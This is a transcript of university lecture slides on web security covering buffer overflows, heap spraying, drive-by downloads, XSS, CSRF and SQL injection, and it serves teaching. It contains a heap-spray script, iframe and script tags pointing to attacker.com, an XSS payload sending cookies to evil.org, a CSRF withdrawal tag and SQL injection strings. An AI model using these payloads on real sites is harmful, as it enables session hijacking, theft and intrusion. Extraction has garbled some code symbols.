Web Security - PowerPoint PPT Presentation

1 / 80
About This Presentation
Title:

Web Security

Description:

Web Security Dr. Department of Computer Science and Information Engineering, National Central University * – PowerPoint PPT presentation

Number of Views:196
Avg rating:3.0/5.0
Slides: 81
Provided by: yanl151
Category:
Tags: security | seminar | web

less

Transcript and Presenter's Notes

Title: Web Security


1
  • Web Security
  • Dr. ? ? ?
  • Department of Computer Science and Information
    Engineering,National Central University

2
  • Stack Smashing Attacks

3
Principle of Stack Smashing Attacks
  • Overwritten control transfer structures, such as
    return addresses or function pointers, to
    redirect program execution flow to desired code.
  • Attack strings carry both code and address(es) of
    the code entry point.

4
A Linux Process Layout and Stack Operations
kernel address space
high address
main() G(1) void G(int a)
H(3) void H(int c)
Libraries heap BSS data code
env, argv, argc
main
stack
G
H
low address
5
Explanation of BOAs (1)
G(int a) H(3) add_g H( int b) char
c100 int i0 while((cigetch())!EOF
)
Gs stack frame
b
return address add_g
Hs stack frame
address of Gs frame point
ebp
C99
0xabc
c b a
0xabb
C0
0xaba
Input String abc
i
esp
6
Explanation of BOAs (2)
Length108 bytes
Attack String xxInjected Codexy0xabc
G(int a) H(3) add_g H( int b) char
c100 int i0 while((cigetch())!EOF
)
X 1 byte y 4 bytes
b
return address add_g
addrress oxabc
Hs stack frame
address of Gs frame point
y
ebp
C99
x
Injected Code
0xabc
0xabb
x x
C0
0xaba
i
esp
7
Injected Code
  • The attacked programs usually have root
    privilege therefore, the injected code is
    executed with root privilege.
  • The injected code is already in machine
    instruction form therefore, a CPU can directly
    execute it.
  • However the above fact also means that the
    injected code must match the CPU type of the
    attacked host.
  • Usually the injected code will fork a shell
    hence, after an attack, an attacker could have a
    root shell.

8
  • Heap Spray and Drive-by Download

9
Heap SprayWikipediaNozzle
  • Heap spraying is a technique used in exploits to
    facilitate arbitrary code execution.
  • Heap spraying is a security threat using a
    strategy of allocating many objects containing
    the attackers exploit code in an applications
    heap.
  • Heap spraying requires that an attacker use
    another memory corruption exploit to trigger an
    attack, but the act of spraying greatly
    simplifies the attack and increases its
    likelihood of success.

10
Heap Spray Overview Puttaraksa
11
Implementation - JavaScript
  • Heap sprays for web browsers
  • are commonly implemented in JavaScript
  • and
  • spray the heap by
  • making copies of a long string
  • and
  • storing these strings in an array, up to the
    point where enough memory has been sprayed to
    cover the area that the exploit targets.
  • P.S. The long string begins with a NOP sled and
    ends with shellcode.

12
Implementation - ActionScript
  • ActionScript
  • In July 2009, exploits were found to be using
    ActionScript to spray the heap in Adobe Flash.

13
Implementation - Images
  • Images
  • Though it has been proven that heap-spraying can
    be done through other means, for instance by
    loading image files into the process, this has
    not seen widespread use (as of August 2008).

14
  • Memory Corruption Exploit

15
Sources of Memory Corruption Exploit
  • Mishandling Tag Attribute Values
  • Virtual Table

16
Mishandling Tag Attribute Values (1)
  • HTTP MS IE Malf. IFRAME/EMBED BO Symantec
  • It is reported that an attacker can exploit this
    condition by creating a malicious Web page
    containing a malformed IFRAME, FRAME or EMBED
    tag.
  • Specifically, the attacker creates the IFRAME,
    FRAME or EMBED tag by specifying large string
    values for the 'SRC' and 'NAME' properties.
  • These values are copied into finite sized process
    buffers resulting in memory corruption.

17
Mishandling Tag Attribute Values (2)Julam
  • ltIFRAME SRCfile//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    BBBBBBBBBBBBBBB
  • BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    BBBBBBB
  • BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    BBBBBBBB NAMECCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
    CCCCCCCCCCCCCCCC
  • CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
    CCCCCgt
  • lt/IFRAMEgt
  • Result
  • eip stops at address 0x769f682f

18
Mishandling Tag Attribute Values (3)Julam
  • memory new Array()
  • for (i0ilt700i)
  • memoryi block shellcode

19
Virtual Table Foster et al.
  • The virtual table is a lookup table of functions
    used to resolve function calls in a dynamic/late
    binding manner.
  • Class objects and structures are often stored on
    the heap.
  • One field of a class object is a pointer to its
    virtual table, called virtual-function table
    pointer.

20
Virtual Table Foster et al. Overview
__vptr
char a100
__vptr
char a100
21
Virtual Table Ratanaworabhan et al. Spraying
the Heap
  • ltSCRIPT language"text/javascript"gt
  • shellcode unescape("u4343u4343...")
  • oneblock unescape("u0D0Du0D0D")
  • var fullblock oneblock
  • while (fullblock.lengthlt0x40000)
  • fullblock fullblock
  • sprayContainer new Array()
  • for (i0 ilt1000 i)
  • sprayContaineri fullblock shellcode
  • lt/SCRIPTgt

Shell Code
NOP Sled
22
Result
  • Because the size of the sprayed heap area may be
    tens of MBs, ASLR may not work as expected.

23
Drive-by Download Attacks wikipedia
  • Download of spyware, a computer virus, or any
    kind of malware that happens without knowledge of
    the user.
  • Drive-by downloads may happen by
  • visiting a website
  • viewing an e-mail message
  • or
  • by clicking on a deceptive popup window.

24
Clicking on a Deceptive Popup Window
  • For instance, a user clicks on the window in the
    mistaken belief
  • that it is an error report from his own PC
  • or
  • that it is an innocuous advertisement popup.
  • In such cases, the "supplier" may claim that the
    user "consented" to the download though he was
    completely unaware of having initiated a
    malicious software download.

25
Drive-by Downloads using Web Pages
  • Features
  • Same appearance as the original webpage
  • Secret downloads
  • Automatic installation
  • Based on vulnerabilities of browsers, plug-ins,
    or OSes

26
Client side
WWW
Good web server
Vulnerable browser
Malicious web server
bad.htm
attacker.com
ltiframe srchttp//attacker.com/bad.htm
height0 width0gt lt/iframegt ltscript
srchttp//attacker.com/bad.jsgtlt/scriptgt
27
Client side
WWW
Good web server
Vulnerable browser
Malicious web server
bad.htm
attacker.com
document.write(unescape("3C73637269707420
6C616E67756167653D226A617661736372
697074223E0D0A6966286E61766967617
46F722E757365724167656E742E746F4C
6F7765724361736528292E696E6465784F
6628225C7836445C7837335C78
attacker2.com
28
Discuss
  • Why not inject shell code at the first stage?
    (i.e. inject shell code to the good web server
    directly)

29
Drive-by Downloads
  • Why Drive-by-Downloads?
  • Deploy malware on computers of victims
  • Large scale (vs. target attacks)
  • Bypass firewalls or NAT protection
  • Current solutions
  • Static web-page analysis
  • Web-sites reputation
  • Microsoft Killbit

30
  • HTTP Cookie Wikipedia

31
HTTP Cookies
  • HTTP cookies, sometimes known as web cookies or
    just cookies, are parcels of text
  • sent by a server to a web browser
  • and then sent back unchanged by the browser each
    time it accesses that server
  • HTTP cookies are used for
  • authenticating
  • tracking
  • maintaining specific information about users,
    such as
  • site preferences
  • the contents of their electronic shopping carts.
  • The term "cookie" is derived from "magic cookie,"
    a well-known concept in Unix computing which
    inspired both the idea and the name of HTTP
    cookies.

32
Cookie Delivery
33
Examine the Cookies
  • Most browsers supporting JavaScript allow the
    user to see the cookies that are active with
    respect to a given page by typing
    javascriptalert("Cookies "document.cookie) in
    the browser URL field.
  • Some browsers incorporate a cookie manager for
    the user to see and selectively delete the
    cookies currently stored in the browser.

34
Third-party Cookies
  • While cookies are only sent to
  • the server setting them
  • or
  • one in the same Internet domain,
  • a Web page may contain images or other
    components stored on servers in other domains.
  • Cookies that are set during retrieval of these
    components are called third-party cookies.

35
Using Third-party Cookies to Track a Users
Activity
  • Advertising companies use third-party cookies to
    track a user across multiple sites.
  • In particular, an advertising company can track a
    user across all pages where it has placed
    advertising images or Web bugs.
  • Knowledge of the pages visited by a user allows
    the advertisement company to target advertisement
    to the user's presumed preferences.

36
Tracking Example
37
Privacy Threat
  • The possibility of building a profile of users
    has been considered by some a potential privacy
    threat,
  • even when the tracking is done on a single domain
  • but especially when tracking is done across
    multiple domains using third-party cookies.
  • For the above reason, some countries have
    legislation about cookies.

38
  • Cross-site Scripting

39
Categories
  • Non-persistent  XSS (Reflected XSS)
  • the most common type nowadays
  • Persistent XSS

40
  • Non-persistent XSS

41
Through Hyperlinks
  • An attacker may be able to embed their malicious
    code within a hyperlink to the target site. When
    the client web browser follows the link, the URL
    sent to trusted.org includes malicious code. The
    site (trusted.org) sends a page back to the
    browser including the value of criteria without
    validating user supplied input , which
    consequently forces the execution of code from
    the evil attackers server.
  • For example
  • ltA HREF"http//trusted.org/search.cgi?criter
    ialtSCRIPT SRC'http//evil.org/badkama.js'gtlt/SCRI
    PTgt"gt Go to trusted.org lt/Agt
  • In the attack above, one source is inserting code
    into pages sent by another source.
  • It should be noted that this attack disguises
    the link as a link to http//trusted.org, can
    be easily included in an HTML email message,
    does not supply the malicious code inline, but is
    downloaded from
  • http//evil.org. Thus the attacker
    retains control of the script and can
  • update or remove the exploit code at
    anytime.

Web browser
trusted.org
42
Ways to Deploy Hyperlinks
  • The user will most likely click on this link from
  • another website,
  • instant message,
  • or
  • simply just reading a web board or email message.

43
Non-persistent Cross Site Scripting (XSS)
  • A non-persistent cross-site scripting (XSS)
    vulnerability is caused by the failure of an web
    based application to validate user supplied input
    before returning it to the client system.
  • By causing the victims browser to execute
    injected code under the same permissions as the
    web application domain, an attacker can bypass
    the traditional Document Object Model (DOM)
    security restrictions which can result in
  • cookie theft,
  • account hijacking,
  • changing of web application account settings,
  • spreading of a webmail virus, etc.

44
The Most Common Victims to Non-persistent XSS
  • The most common web components that fall victim
    to XSS vulnerabilities include
  • CGI scripts,
  • search engines,
  • interactive bulletin boards,
  • and
  • custom error pages with poorly written input
    validation routines.
  • Additionally, a victim doesnt necessarily have
    to click on a link XSS code can also be made to
    load automatically in an HTML e-mail with certain
    manipulations of the IMG or IFRAME HTML tags.

Each of these components could generate a web
page.
45
Hijack Web Application Sessions
  • The most popular XSS attack (and devastating) is
    the harvesting of
  • authentication cookies
  • and
  • session management tokens.
  • With this information, it is often a trivial
    exercise for an attacker to hijack the victims
    active session, completely bypassing the
    authentication process.

46
Traditional Non-persistent XSS Web Application
Hijack Scenario (1)
  • The attacker investigates an interesting site
  • that normal users must authenticate to gain
    access to
  • and
  • that tracks the authenticated user through the
    use of cookies or session IDs
  • The attacker finds a XSS vulnerable page on the
    site, for instance
    http//trusted.org/account.asp.
  • Using a little social engineering,
  • the attacker creates a special link to the site
  • and
  • embeds it in an HTML email that he sends to a
    long list of potential victims.

47
Traditional Non-persistent XSS Web Application
Hijack Scenario (2)
  • Embedded within the special link are some coding
    elements specially designed to transmit a copy of
    the victims cookie back to the attacker. For
    instance ltimg src"http//trusted.org/account.asp
    ?akltscriptgtdocument.location.replace('http//evil
    .org/steal.cgi?'document.cookie) lt/scriptgt"gt
  • Unknown to the victim, the attacker has now
    received a copy of their cookie information.
  • The attacker now visits the web site and, by
    substituting his cookie information with that of
    the victims, is now perceived to be the victim by
    the server application.

48
Traditional Non-persistent XSS Web Application
Hijack Steps David Endler
49
  • SOLUTIONS AND WORKAROUNDS David Endler

50
For Users
  • As a web application user, there are a few ways
    to protect yourself from XSS attacks.
  • The first and most effective solution is to
    disable all scripting language support in your
    browser and email reader.
  • If this is not a feasible option for business
    reasons, another recommendation is to use
    reasonable caution when clicking links in
    anonymous e-mails and dubious web pages.

51
Web Application Developers and Vendors
  • Web application developers and vendors should
    ensure that all user input is parsed and filtered
    properly.
  • User input includes
  • things stored in GET Query strings,
  • POST data,
  • Cookies,
  • URLs,
  • and
  • in general any persistent data that is
    transmitted between the browser and web server.

52
User Input Filtering
  • The best philosophy to follow regarding user
    input filtering is to deny all but a pre-selected
    element set of benign characters in the web input
    stream.
  • This prevents developers from having to
    constantly predict and update all forms of
    malicious input in order to deny only specific
    characters (such as lt ? etc.).
  • Some decent guidelines for input filtering can be
    found in the OWASP Requirements document OWASP
    Guide to Building Secure Web Applications and Web
    Services".

53
Test
  • Once an application has evolved out of the design
    and development phases, it is important to
    periodically test for XSS vulnerabilities since
    application functionality is constantly changing
    due to
  • upgrades
  • integration of third party technologies
  • decentralized website authoring

54
Vulnerability Web Application Scanners
  • Many web application vulnerability scanners start
    to include checks for XSS.
  • The OWASP Testing group plans to produce a
    methodology for checking XSS on a web
    application.
  • Web Scarab

55
Examples Used to Bypass Being Detected
  • XSS Cheat Sheet

56
XSS Tool
  • XSS-Proxy

57
  • Cross-site Request
  • ForgeryWikipedia

58
Definition
  • Cross-site request forgery, also known as
    one-click attack or session riding and
    abbreviated as CSRF ("sea-surf") or XSRF, is a
    type of malicious exploit of a website whereby
    unauthorized commands are transmitted from a user
    that the website trusts.

59
Background
  • CSRF vulnerabilities have been known and in some
    cases exploited since the 1990s.
  • Because it is carried out from the user's IP
    address, CSRF is untraceable without proper
    logging.

60
Impact
  • As of 2007 there are few well-documented
    examples.
  • About 18 million users of eBay's Internet Auction
    Co. at Auction.co.kr in Korea lost personal
    information in February 2008.
  • Customers of a bank in Mexico were attacked in
    early 2008 with an image tag in email.

61
Example
  • One user, Bob, might be browsing a chat forum
    where another user, Mallory, has posted a
    message.
  • Suppose that Mallory has crafted an HTML image
    element that references a script on Bob's bank's
    website (rather than an image file), e.g.,
  • ltimg src"http//bank.example/withdraw?accoun
    tbobamount1000000formallory"gt
  • If Bob's bank keeps his authentication
    information in a cookie
  • and
  • if the cookie hasn't expired,
  • then the attempt by Bob's browser to load the
    image will submit the withdrawal form with his
    cookie, thus authorizing a transaction without
    Bob's approval.

62
Common CSRF Characteristics
  • Involve sites that rely on a user's identity
  • Exploit the site's trust in that identity
  • Trick the user's browser into sending HTTP
    requests to a target site
  • Involve HTTP requests that have side effects

63
Common CSRF Victims
  • At risk are web applications that perform actions
    based on input from trusted and authenticated
    users without requiring the user to authorize the
    specific action.
  • A user that is authenticated by a cookie saved in
    his web browser could unknowingly send an HTTP
    request to a site that trusts him and thereby
    cause an unwanted action.

64
Common CSRF Pitfalls
  • CSRF attacks using images are often made from
    Internet forums, where users are allowed to post
    images but not JavaScript.

65
CSRF Assumptions
  • This attack relies on a few assumptions
  • The attacker has knowledge of sites on which the
    victim has current authentication (more common on
    web forums, where this attack is most common)
  • The attacker's "target site" has authentication
    cookies, or the victim has a current session
    cookie with the target site
  • The "target site" doesn't have secondary
    authentication for actions (such as form tokens)

66
Example
  • Assume a script in the document at
    http//store.company.com/dir/other.html
    executes the following statement
  • document.domain "company.com"
  • After that statement executes, the page would
    pass the origin check with http//company.com/dir/
    page.html.
  • However, by the same reasoning, company.com could
    not set document.domain to othercompany.com.

67
Prevention
  • For the web site, switching from
  • a persistent authentication method (e.g.
    a
  • cookie or HTTP authentication)
  • to
  • a transient authentication method (e.g. a
    hidden
  • field provided on every form)
  • will help prevent these attacks.
  • hidden field of a form
  • A similar approach is to include a secret,
    user-specific token in forms that is verified in
    addition to the cookie.
  • a field of a form filled out by a user

68
  • SQL Injection SK

69
What is SQL Injection?
  • Many web pages take parameters from web users,
    and make SQL query to the database.
  • Take for instance when a user login a web page,
    the web page accepts that user name and password
    and makes SQL query to the database to check if
    the user has valid name and password.
  • With SQL Injection, it is possible for us to send
    crafted user name and/or password field that will
    change the SQL query and thus grant us something
    else.

70
SQL Injection Attack Channels
  • SQL injection is one type of web hacking that
    require nothing but port 80 and it might just
    work even if the admin is patch-happy.
  • It attacks on the web application (like ASP, JSP,
    PHP, CGI, etc) itself rather than on the web
    server or services running in the OS.

71
What You Should Look for?
  • Try to look for pages that allow you to submit
    data, i.e
  • login page,
  • search page,
  • feedback, etc.
  • Sometimes, HTML pages use POST command to send
    parameters to another ASP page. Therefore, you
    may not see the parameters in the URL. However,
    you can check the source code of the HTML, and
    look for "FORM" tag in the HTML code. You may
    find something like this in some HTML codes
  • ltFORM actionSearch/search.asp
    methodpostgtltinput typehidden nameA
    valueCgtlt/FORMgtEverything between the ltFORMgt
    and lt/FORMgt has potential parameters that might
    be useful (exploit wise).

72
What If You Can't Find Any Page That Takes Input?
  • You should look for pages like ASP, JSP, CGI, or
    PHP web pages.
  • Try to look especially for URL that takes
    parameters, likehttp//duck/index.asp?id10

73
How Do You Test If It Is Vulnerable?
  • Start with a single quote trick. Input something
    likehi' or 11--
  • into login, or password, or even in the URL.
  • Example  - Login hi' or 11-- - Pass hi' or
    11-- - http//duck/index.asp?idhi' or 11
  • If luck is on your side, you will get login
    without any login name or password.

74
Hidden Field
  • If you must do this with a hidden field, just
    download the source HTML from the site, save it
    in your hard disk, modify the URL and hidden
    field accordingly.
  • ExampleltFORM actionhttp//duck/Search/search.a
    sp methodpostgtltinput typehidden nameA
    value"hi' or 11--"gtlt/FORMgt

75
Database Table ExampleCQU
76
Database Table product
PName PCategory price number bar code
bread food 30 100 100-234-7
cake food 300 20 100-987-6
cookie food 50 70 100-812-9
model car toy 200 20 300-567-7
figure toy 300 80 300-987-9
paper stationery 0.5 5000 981-897-7
pen stationery 20 300 981-967-0
77
Web Application Input and Its Corresponding SQL
Query
  • Take an asp page that will link you to another
    page with the following URLhttp//duck/index.as
    p?categoryfoodIn the URL, 'category' is the
    variable name, and 'food' is the value assigned
    to the variable. In order to do that, an ASP
    might contain the following codev_cat
    request("category")sqlstr"SELECT FROM product
  • WHERE PCategory'" v_cat "'"set
    rsconn.execute(sqlstr)As we can see, our
    variable will be wrapped into v_cat and thus the
    SQL statement should becomeSELECT FROM
    product WHERE PCategory'food'The query should
    return a result set containing one or more rows
    that match the WHERE condition, in this case,
    'food'.

78
Why ' or 11-- ?
  • Now, assume that we change the URL into something
    like thishttp//duck/index.asp?categoryfood'
    or 11--Now, our variable v_cat equals to
    "food' or 11-- ", if we substitute this in the
    SQL query, we will have
  • SELECT
  • FROM product
  • WHERE PCategory'food' or 11--'The query
    now should now select everything from the product
    table regardless if PCategory is equal to 'food'
    or not.
  • A double dash "--" tell MS SQL server ignore the
    rest of the query, which will get rid of the last
    hanging single quote (').
  • Sometimes, it may be possible to replace double
    dash with single hash "".

79
Other Crafted Input (1)
  • However, if it is not an SQL server, or you
    simply cannot ignore the rest of the query, you
    also may try' or 'a''aThe SQL query will now
    become
  • SELECT
  • FROM product
  • WHERE PCategory'food' or 'a''a'It should
    return the same result.

80
Other Crafted Input (2)
  • Depending on the actual SQL query, you may have
    to try some of these possibilities' or 11--"
    or 11--or 11--' or 'a''a" or "a""a') or
    ('a''a
Write a Comment
User Comments (0)
About PowerShow.com